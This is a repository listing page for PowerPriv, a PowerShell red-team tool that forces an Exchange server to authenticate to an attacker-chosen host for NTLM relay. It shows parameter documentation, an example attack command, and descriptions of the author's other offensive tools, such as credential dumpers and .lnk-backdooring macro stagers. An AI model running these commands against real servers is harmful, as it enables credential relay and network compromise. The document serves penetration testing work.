G0ldenGunSec/PowerPriv G0ldenGunSec/PowerPriv

  • Stars
    star
    123
  • Rank 290,145 (Top 6 %)
  • Language
    PowerShell
  • License
    BSD 3-Clause "New...
  • Created almost 6 years ago
  • Updated almost 6 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
G0ldenGunSec/PowerPriv
github

G0ldenGunSec

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A Powershell implementation of PrivExchange designed to run under the current user's context

PowerPriv

DESCRIPTION

A powershell implementation of PrivExchange by @_dirkjan (original code found here: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Useful for environments on which you cannot run python-based applications, have user credentials, or do not want to drop files to disk. Will cause the target exchange server system account to attempt to authenticate to a system of your choice.

-targetHost

Hostname or IP of the target exchange box. Based on DNS config may require FQDN if using hostname. (Required)

-attackerHost

Hostname or IP of a system you control, and are ideally running ntlmrelayx on. We are telling the Exchange server to attempt to authenticate to this system. Based on DNS config may require FQDN if using hostname. (Required)

-exchangePort

Port to attempt to connect to Exchange server over. Default is 443.

-attackerPort

Port Exchange should attempt to connect back to the attacker over. Default is 80

-attackerPage

Page we are telling the Exchange server to connect to on our attack system. Slashes are not required. Default is powerPriv.

-noSSL

Set to true if you dont want to use https to connect initially to the Exchange server. Default is false (use https).

-Version

Version of Exchange server we're targeting. Default is 2013.

EXAMPLE

powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016

NOTES

Author: @g0ldenGunSec  - Based on the tool created by @_dirkjan
Only use this tool on networks you own or have permission to test against.

More Repositories

1

SharpSecDump

.Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py
C#
571
star
2

SharpTransactedLoad

Load .net assemblies from memory while having them appear to be loaded from an on-disk location.
C#
157
star
3

GetWebDAVStatus

Determine if the WebClient Service (WebDAV) is running on a remote system
C
117
star
4

wmiServSessEnum

.net tool that uses WMI queries to enumerate active sessions and accounts configured to run services on remote systems
C#
32
star
5

DayBird

Extension functionality for the NightHawk operator client
C#
26
star
6

backdoorLnkMacroStagerObfuscated

Obfuscated Powershell Empire 2.x stager that allows for creation of a macro which uses VBA to backdoor .lnk files on the system. This is done to obtain a shell via follow-up user interaction natively through powershell, in order to evade tools that monitor process execution. Backdoors are self-cleaning on execution.
Python
17
star
7

PreliminaryBackdoorLnkMacroStager

Original testing version of the backdoorLnkMacroStager - please reference backdoorLnkMacroStagerObfuscated or backdoorLnkMacroStagerCellEmbed for current versions
Python
5
star
8

backdoorLnkMacroStagerCellEmbed

Powershell Empire 2.x stager that allows for creation of a macro which uses VBA to backdoor .lnk files on the system. This is done to obtain a shell via follow-up user interaction natively through powershell, in order to evade tools that monitor process execution. Data is embedded in .xls cells and called in the macro to evade detection. Backdoors are self-cleaning on execution.
Python
5
star
9

Service-Executable-Permissions-Checker

PowerShell
3
star